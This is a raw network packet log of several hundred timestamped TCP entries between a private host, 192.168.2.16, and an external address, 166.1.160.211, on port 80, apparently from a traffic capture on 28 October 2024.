                                                                                                                                                              Oct 28, 2024 19:46:23.499568939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499603033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499614954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.499680996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499715090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499730110 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.499747992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499780893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499795914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.499865055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499898911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499916077 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.499932051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499967098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.499978065 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.500535011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.500566959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.500577927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.500602007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.500637054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.500648022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.500669956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.500703096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.500710011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.500737906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.500782967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.501241922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.501276970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.501312971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.501332045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.501347065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.501393080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.585757017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.591646910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.600717068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.600723982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.600759029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.600791931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.600805998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.600826979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.600872993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.601105928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601300001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601335049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601352930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.601388931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601423979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601433039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.601460934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601510048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.601512909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601547956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601582050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601596117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.601617098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601653099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.601666927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.602113962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602164030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.602332115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602385044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602418900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602430105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.602472067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602514982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.602525949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602561951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602596045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602608919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.602628946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602664948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602675915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.602699041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.602749109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603017092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603070021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603105068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603137016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603177071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603210926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603224039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603245020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603291035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603296995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603367090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603399992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603410959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.603436947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603472948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.603483915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.650245905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.846853018 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852633953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852721930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852758884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852777004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852794886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852828979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852840900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852884054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852916956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852936029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.852967024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.852999926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853013992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853050947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853085041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853111029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853118896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853168011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853168964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853204966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853236914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853255987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853305101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853338957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853348970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853373051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853425026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853444099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853478909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853512049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853522062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853545904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853590965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853596926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853631973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853663921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853682041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853698969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853741884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853748083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853782892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853832006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853832960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853867054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853899956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853914022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.853934050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853967905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.853982925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854003906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854053020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854420900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854526997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854574919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854578972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854612112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854661942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854676962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854710102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854743958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854752064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854778051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854811907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854819059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.854863882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.854897976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969502926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969657898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969691038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969706059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.969724894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.969774961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970108986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970143080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970176935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970185995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970227957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970262051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970272064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970297098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970330000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970339060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970382929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970416069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970424891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970449924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970484018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970494986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970518112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970551014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970563889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970588923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970622063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.970633030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.970992088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971025944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971038103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971076965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971112013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971122980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971163034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971194983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971206903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971230984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971281052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971404076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971456051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971489906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971501112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971554995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971586943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971601963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971621990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971654892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971673965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971689939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971736908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971772909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971806049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971838951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971848965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971873999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971921921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971925974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.971956015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971991062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972007036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972457886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972491026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972503901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972542048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972575903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972580910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972609997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972645998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972656012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972697020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972729921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972742081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972764969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972798109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972811937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972851038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972883940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972898006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972918034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972950935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972969055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972985983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.973037004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.974948883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.974981070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.974997044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975027084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.975034952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975059986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975073099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.975075960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975091934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975109100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975116968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.975163937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.162339926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168148041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168262959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168303013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168320894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168339014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168382883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168391943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168435097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168469906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168479919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168520927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168554068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168565989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168623924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168658018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168669939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168690920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168724060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168732882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168776035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168824911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168828011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168858051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168891907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168906927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168951988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168984890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284126997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284162045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284171104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284198046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284231901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284240007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284269094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284303904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284312963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284338951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284373999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284382105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284893990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284986973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284996033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285048962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285084009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285093069 CET4972680192.168.2.16166.1.160.211
